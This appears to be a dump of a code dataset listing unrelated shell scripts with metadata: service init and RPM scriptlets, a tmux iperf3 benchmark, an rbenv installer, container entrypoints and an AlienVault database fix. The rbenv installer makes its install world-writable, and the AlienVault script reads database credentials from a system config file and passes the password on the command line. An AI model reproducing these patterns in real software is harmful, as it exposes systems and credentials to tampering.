/cbase/moxi/moxi-1.8.0_8_g52a5fa8/scripts/moxi-init.rhat.in
|
UTF-8
| 1,584
| 3.828125
| 4
|
[] |
no_license
|
#! /bin/sh
#
# chkconfig: - 55 45
# description: The moxi is a memchached proxy
# processname: moxi
# config: /etc/sysconfig/moxi
# Source function library.
. /etc/rc.d/init.d/functions
# Defaults; /etc/sysconfig/moxi may override any of these.
USER=nobody
MAXCONN=1024
CPROXY_ARG=/etc/moxi.conf
OPTIONS=""
if [ -f /etc/sysconfig/moxi ];then
  . /etc/sysconfig/moxi
fi
# Check that networking is up.
if [ "$NETWORKING" = "no" ]
then
  exit 0
fi
# if CPROXY_ARG is a config file reference check it's existance
# (the lexicographic comparisons test whether the first character looks
# like a path ('.' or '/'-ish range) rather than a host:port cluster spec)
if ([[ "/" < "$CPROXY_ARG" ]] && [[ "$CPROXY_ARG" < "0" ]]) || ([[ "." < "$CPROXY_ARG" ]] && [[ "$CPROXY_ARG" < "/" ]]); then
  if [ ! -f "$CPROXY_ARG" ]; then
    echo "Misconfiguration! '$CPROXY_ARG' is absent. See /usr/share/doc/moxi-%{version}/examples/ for configuration examples. Aborting."
    exit 1
  fi
fi
RETVAL=0
prog="moxi"
# Start moxi as a daemon: fix /var/run/moxi ownership first, then launch
# with the configured user, connection limit and cluster/config argument.
# On success, create the subsys lock so `status`/`condrestart` work.
start () {
	echo -n $"Starting $prog: "
	# insure that /var/run/moxi has proper permissions
	chown $USER /var/run/moxi
	daemon /usr/bin/moxi -d -u $USER -c $MAXCONN -z $CPROXY_ARG -P /var/run/moxi/moxi.pid $OPTIONS
	RETVAL=$?
	echo
	[ $RETVAL -eq 0 ] && touch /var/lock/subsys/moxi
	}
# Stop moxi via killproc; on success remove the lock and pid files.
stop () {
	echo -n $"Stopping $prog: "
	killproc moxi
	RETVAL=$?
	echo
	if [ $RETVAL -eq 0 ] ; then
		rm -f /var/lock/subsys/moxi
		rm -f /var/run/moxi.pid
	fi
	}
# Restart = stop then start.
restart () {
	stop
	start
}
# See how we were called.
case "$1" in
  start)
	start
	;;
  stop)
	stop
	;;
  status)
	status moxi
	;;
  restart|reload)
	restart
	;;
  condrestart)
	# Restart only if the service was running (subsys lock present).
	[ -f /var/lock/subsys/moxi ] && restart || :
	;;
  *)
	echo $"Usage: $0 {start|stop|status|restart|reload|condrestart}"
	exit 1
esac
exit $?
| true
|
4b45fad5ecaf46d9469e6e46984fb71b74fe9f2a
|
Shell
|
zirui-HIT/transition-amr-parser
|
/tests/minimal_test.sh
|
UTF-8
| 346
| 2.546875
| 3
|
[
"Apache-2.0"
] |
permissive
|
set -o errexit
set -o pipefail
set -o nounset
# Minimal end-to-end smoke test driven against the wiki25 mock corpus.
# Delete previous runs is exist
rm -Rf DATA/wiki25/*
# simulate completed corpora extraction and alignment
bash tests/create_wiki25_mockup.sh
# Run local test
bash run/run_experiment.sh configs/wiki25-structured-bart-base-sep-voc.sh
# If we get here we passed
# Fix: never interpolate data ($0) into the printf format string.
printf '[\033[92mOK\033[0m] %s\n' "$0"
| true
|
7d1a649e6b6a74b8dae41e5e0f187fa20dddfc79
|
Shell
|
dfguan/fuzzy
|
/aces_out_var.bash
|
UTF-8
| 193
| 3.28125
| 3
|
[
"MIT"
] |
permissive
|
#Author : Dengfeng Guan
#Purpose : function can access outside variable
# NOTE(review): this function is named `test`, which shadows the shell
# builtin of the same name for anything that sources this file; it is
# kept as-is here because `export -f test` makes the name part of the
# external interface, but consider renaming it.
test() {
	echo $dir # can access $dir; NB: doesn't work with bsub
}
export -f test
# When a directory argument is supplied, demonstrate the access.
if [ "$#" -gt 0 ]
then
	dir=$1
	test
fi
| true
|
80f3a3c13cd93f3d5b6b1c1b21d2319fb0f61b1c
|
Shell
|
nickvonklemp/Bash-Scripts
|
/iperf3/sperf.sh
|
UTF-8
| 3,568
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
# Normalise a raw iperf3 bitrate: values in [100, 2000] are assumed to be
# Mbits and are divided by 1000 via bc to express them in Gbits; anything
# else passes through unchanged.  Result goes to STDOUT.
# Fix: the original ended with `return "$input"`, but `return` only takes
# a small integer status — with a fractional value it fails — and the
# caller captures stdout (OUTPUT=$(scale ...)), so the function must
# *print* its result.  Non-integer inputs now pass through quietly.
function scale {
	local input=$1
	if [ "$input" -le 2000 ] 2>/dev/null && [ "$input" -ge 100 ] 2>/dev/null; then
		input=$(echo "$input/1000" | bc -l)
	fi
	echo "$input"
}
# Block until the given text appears in a tmux pane's visible contents.
# Arguments: $1 = tmux pane target, $2 = text (grep pattern).
# Returns 0 once the text is seen; polls every 0.25 s forever otherwise.
# Fix: the old trailing `return -1` was both unreachable (the loop only
# exits via `return 0`) and invalid — return statuses must be 0-255.
function wait_text {
	local pane="$1"
	local text="$2"
	while :; do
		tmux capture-pane -t "$pane" -p | grep "$text" > /dev/null && return 0
		sleep 0.25
	done
}
# --- main ---------------------------------------------------------------
# Drive an iperf3 client/server pair inside tmux panes, sweeping the
# parallel-stream count for a fixed MSS against a given server, and
# append "mss,streams,bitrate" rows to output.csv.
# Usage: sperf.sh <server_ip> <mss>
# Refactor: the seven near-identical copy-pasted measurement blocks are
# collapsed into one loop; the per-copy quirks that mattered (awk field 7
# for -P 1 vs field 6 for the multi-stream [SUM] line, and the scale()
# call applied only to the single-stream run) are preserved.  Redundant
# commented-out server restarts and uneven extra `sleep 1`s were dropped.
touch output.csv
ip=$1          # iperf3 server address
s=$2           # MSS value passed via -M
session=nick
window=${session}:0

# Launch the iperf3 server once in pane 4.
pane=${window}.4
tmux send-keys -t "$pane" C-z "iperf3 -s -A 2 -p 1" Enter
sleep 1

for streams in 1 2 4 8 16 32 64; do
	pane=${window}.2
	tmux send-keys -t "$pane" C-z "clear" Enter
	sleep 1
	tmux send-keys -t "$pane" C-z "iperf3 -c $ip -A 2 -p 1 -P $streams -M $s" Enter
	sleep 2
	wait_text "$pane" "iperf Done."
	# With -P 1 the "receiver" summary line carries the bitrate in awk
	# field 7; multi-stream runs report it on the [SUM] line in field 6.
	if [ "$streams" -eq 1 ]; then
		OUTPUT="$(tmux capture-pane -J -p -t $pane | tail -5 | grep receiver | awk '{ print $7 }')"
		echo "$OUTPUT"
		OUTPUT=$(scale "$OUTPUT")
	else
		OUTPUT="$(tmux capture-pane -J -p -t $pane | tail -5 | grep receiver | awk '{ print $6 }')"
	fi
	STRING="$s,$streams,$OUTPUT"
	echo "$STRING" >> output.csv
	echo "$STRING"
	sleep 1
done

# Tear the server down.
pane=${window}.4
tmux send-keys -t "$pane" C-z "pkill -9 iperf3" Enter
sleep 1
| true
|
9a0766242ee1c5e5ef60a83c3b0ea24c7a118862
|
Shell
|
alleny77746/McBlooms
|
/config_old/recipes/templates/rbenv_installer.sh.erb
|
UTF-8
| 976
| 3.734375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Sourced from: https://github.com/rinrinne/install-shared-rbenv
# Install (or update) a shared rbenv under the templated root together
# with a standard set of plugins.  ERB template: <%= ... %> is expanded
# by the provisioning recipe before this script runs.
set -e
[ ! -z $RBENV_ROOT ] || RBENV_ROOT=<%= rbenv_root %>
echo Install rbenv to $RBENV_ROOT...
# Clone on the first run; fast-forward on subsequent runs.
if [ -d $RBENV_ROOT ]; then
  echo rbenv is already installed. So updating...
  cd $RBENV_ROOT
  git pull
else
  mkdir -p $RBENV_ROOT
  cd $RBENV_ROOT
  git clone https://github.com/sstephenson/rbenv.git .
fi
# Install plugins:
# Each entry is "github_user/repo".
PLUGINS=(
  sstephenson/rbenv-vars
  sstephenson/ruby-build
  sstephenson/rbenv-default-gems
  fesplugas/rbenv-installer
  fesplugas/rbenv-bootstrap
  rkh/rbenv-update
  rkh/rbenv-whatis
  rkh/rbenv-use
)
# Clone plugins that are missing; pull the ones already present.
for plugin in ${PLUGINS[@]} ; do
  KEY=${plugin%%/*}
  VALUE=${plugin#*/}
  RBENV_PLUGIN_ROOT="${RBENV_ROOT}/plugins/$VALUE"
  if [ ! -d "$RBENV_PLUGIN_ROOT" ] ; then
    git clone https://github.com/$KEY/$VALUE.git $RBENV_PLUGIN_ROOT
  else
    cd $RBENV_PLUGIN_ROOT
    echo "Pulling $VALUE updates."
    git pull
  fi
done
# Shared install: anyone may write (install rubies/gems).
chmod a+w $RBENV_ROOT -R
| true
|
80d128468f57051a7e7a96c7e79f5abd76d289b5
|
Shell
|
sbeliakou/kat-example
|
/k8s-practice-course/k8s-volumes/foreground.sh
|
UTF-8
| 487
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
# Interactive bootstrap banner: wait for kubelet to exist, then for the
# API server to answer, then for node "master" to report Ready, printing
# progress dots along the way and clearing the screen when done.
clear && echo -n "Prepairing kubelet" &&
until $(kubelet --version >/dev/null 2>&1); do echo -n .; sleep 1; done; echo "\nWaiting for master to join" &&
until $(kubectl get componentstatus > /dev/null 2>&1); do echo -n .; sleep 1; done; echo "\nWaiting for master to get ready" &&
while $([ `kubectl get node master -o jsonpath='{.status.conditions[?(@.type=="Ready")].status}'` == "False" ]); do echo -n .; sleep 1; done; echo; history -c; clear; echo "Time to rock!"
| true
|
cc2451e896c36f48a23e33c2e4a04c287f5ae260
|
Shell
|
whostolebenfrog/mr-clojure
|
/src/leiningen/new/mr_clojure/preremove.sh
|
UTF-8
| 1,025
| 3.546875
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
# RPM preremove scriptlet template ({{...}} filled in by the packager):
# gracefully stop the service, hard-killing after a timeout, then
# deregister it from chkconfig on final removal ($1 == 0).
/bin/echo "preremove script started [$1]"
APP_NAME={{lower-name}}
prefixDir=/usr/local/$APP_NAME
identifier=$APP_NAME.jar
# Count java processes whose command line mentions our jar.
isJettyRunning=`pgrep java -lf | grep $identifier | cut -d" " -f1 | /usr/bin/wc -l`
if [ $isJettyRunning -eq 0 ]
then
	/bin/echo "{{upper-name}} is not running"
else
	sleepCounter=0
	sleepIncrement=2
	waitTimeOut=600
	/bin/echo "Timeout is $waitTimeOut seconds"
	/bin/echo "{{upper-name}} is running, stopping service"
	/sbin/service $APP_NAME stop &
	myPid=$!
	# Poll until the JVM is gone, escalating to SIGKILL at the timeout.
	until [ `pgrep java -lf | grep $identifier | cut -d" " -f1 | /usr/bin/wc -l` -eq 0 ]
	do
		if [ $sleepCounter -ge $waitTimeOut ]
		then
			# Fix: the pattern was single-quoted ('$identifier'), so pkill
			# searched for the literal string "$identifier" and never matched.
			/usr/bin/pkill -KILL -f "$identifier"
			/bin/echo "Killed {{upper-name}}"
			break
		fi
		sleep $sleepIncrement
		sleepCounter=$(($sleepCounter + $sleepIncrement))
	done
	wait $myPid
	/bin/echo "{{upper-name}} down"
fi
# $1 == 0 means final removal; otherwise this is an upgrade.
if [ "$1" = 0 ]
then
	/sbin/chkconfig --del $APP_NAME
else
	/sbin/chkconfig --list $APP_NAME
fi
/bin/echo "preremove script finished"
exit 0
|
ab5435a8c21b49fc508ef34e61e1ccd4a0d24b8b
|
Shell
|
gwu-libraries/sfm-elk
|
/docker/logstash/start.sh
|
UTF-8
| 947
| 3.015625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Entrypoint for the sfm-elk logstash container: install prerequisites,
# wait for dependencies, wait for elasticsearch health, run the loader.
# STEP-0 Initial install for sfm
gosu root /opt/sfm-setup/setup_reqs.sh
# STEP-1 Waiting for elasticsearch, mq kibana
echo "Waiting for elasticsearch, mq and kibana"
appdeps.py --port-wait mq:5672 --port-wait elasticsearch:9200 --port-wait kibana:5601 --wait-secs $WAIT_SECS
# NOTE(review): only exit code 1 is treated as failure here — confirm
# appdeps.py cannot fail with any other non-zero code.
if [ "$?" = "1" ]; then
    echo "Problem with application dependencies."
    exit 1
fi
# STEP-2 Check whether elasticsearch status is not red, if it's red wait 30 seconds to try again
# (grep exits 1 once "status":"red" disappears, which ends the loop)
curl -s -XGET elasticsearch:9200/_cluster/health | grep "\"status\":\"red\"" 2>/dev/null 1>/dev/null
until [ $? -eq 1 ]; do
    echo "elasticsearch status is red, wait 30 seconds to try again."
    sleep 30
    curl -s -XGET elasticsearch:9200/_cluster/health | grep "\"status\":\"red\"" 2>/dev/null 1>/dev/null
done
# STEP-3 running the logstash
gosu logstash python sfm_elk_loader.py mq $RABBITMQ_USER $RABBITMQ_PASSWORD elk_loader_$HOSTNAME --debug=$DEBUG $* &
wait
| true
|
96a5345f43809350574d83fc851deb5e0cb303d9
|
Shell
|
FunTimeCoding/vagrant-salt
|
/up-box.sh
|
UTF-8
| 449
| 3.75
| 4
|
[] |
no_license
|
#!/bin/sh -e
# Bring up the named Vagrant box and accept its Salt minion key.
# Usage: up-box.sh BOX_NAME
BOX_NAME="${1}"
if [ -z "${BOX_NAME}" ]; then
    echo "Usage: BOX_NAME"
    exit 1
fi
BOX_DIRECTORY="$(dirname "${0}")/box/${BOX_NAME}"
if [ ! -d "${BOX_DIRECTORY}" ]; then
    echo "Box not found."
    exit 1
fi
cd "${BOX_DIRECTORY}"
vagrant up
# Give the minion a moment to connect before accepting its key.
sleep 10
# On macOS the salt master runs as the current user; Linux needs sudo.
if [ "$(uname)" = Darwin ]; then
    salt-key --yes --accept "${BOX_NAME}"
else
    sudo salt-key --yes --accept "${BOX_NAME}"
fi
| true
|
cd6e797d64d3c684adc57ad327baa71369110732
|
Shell
|
esstorm/codechecker-docker
|
/codechecker/init.sh
|
UTF-8
| 594
| 2.765625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Entrypoint: start a CodeChecker server backed by Postgres and register
# the default product.
export PATH=$PATH:/home/casper/codechecker/build/CodeChecker/bin
. /home/casper/codechecker/venv/bin/activate
# Wait for up to 300 secs
echo '=> Waiting for postgres container to be available'
/wait-for-it.sh -t 300 db:5432
echo '=> Postgres is available!'
# Server runs in the background so the product registration below can
# execute in the same container process.
CodeChecker server --postgresql --not-host-only \
    --db-host db --db-port 5432 \
    --db-username codechecker --db-name codechecker_config &
# NOTE(review): there is no wait between launching the server and adding
# the product — if the server is slow to come up this call may race it.
CodeChecker cmd products add Default --name "Default Product" \
    --postgresql \
    --db-host db --db-port 5432 \
    --db-username codechecker --db-name default_product
|
874a469ac521102a86832c93b48f56bd27c61210
|
Shell
|
crgove/ejercicios-_practica_shell_script
|
/practica9.sh
|
UTF-8
| 101
| 2.953125
| 3
|
[] |
no_license
|
# Print the first twenty multiples of five, accumulating in $valor.
valor=0
for i in {1..20}; do
  valor=$((valor + 5))
  echo "Los valores son $valor"
done
| true
|
d64cf752e54b80d2aed382bf5d3583e8cd495075
|
Shell
|
nma-io/alienvault_tools
|
/correlation_fix.sh
|
UTF-8
| 681
| 2.875
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# Fix that pesky correlation issue where
# alerts can never be closed/worked.
# Cron? One off? Depending on your frequency needs
# Nicholas Albright (@nma_io)
# Fixes: modern $() substitution and quoted expansions so credentials
# containing spaces or special characters do not word-split or glob.
# Pull DB credentials out of the AlienVault setup file.
HOST=$(grep ^db_ip= /etc/ossim/ossim_setup.conf | cut -f 2 -d "=" | sed '/^$/d')
USER=$(grep ^user= /etc/ossim/ossim_setup.conf | cut -f 2 -d "=" | sed '/^$/d')
PASS=$(grep ^pass= /etc/ossim/ossim_setup.conf | cut -f 2 -d "=" | sed '/^$/d')
DB='alienvault'
# Mark alarms older than ~8 minutes (500 s) as removable again.
now=$(date +%s)
calc=$((now - 500))
offset="$(date -d @$calc -u +'%Y-%m-%d %H:%M:%S')"
# NOTE(review): sshpass is an ssh helper and the trailing -p makes mysql
# prompt interactively; this combination looks wrong but is kept as-is —
# confirm the intended invocation (e.g. mysql -p"$PASS") before changing.
sshpass -p "$PASS" mysql --default-character-set=utf8 -A -u "$USER" -h "$HOST" "$DB" -p -e "update alarm set removable=1 where status='open' and removable = 0 and timestamp < '$offset';"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.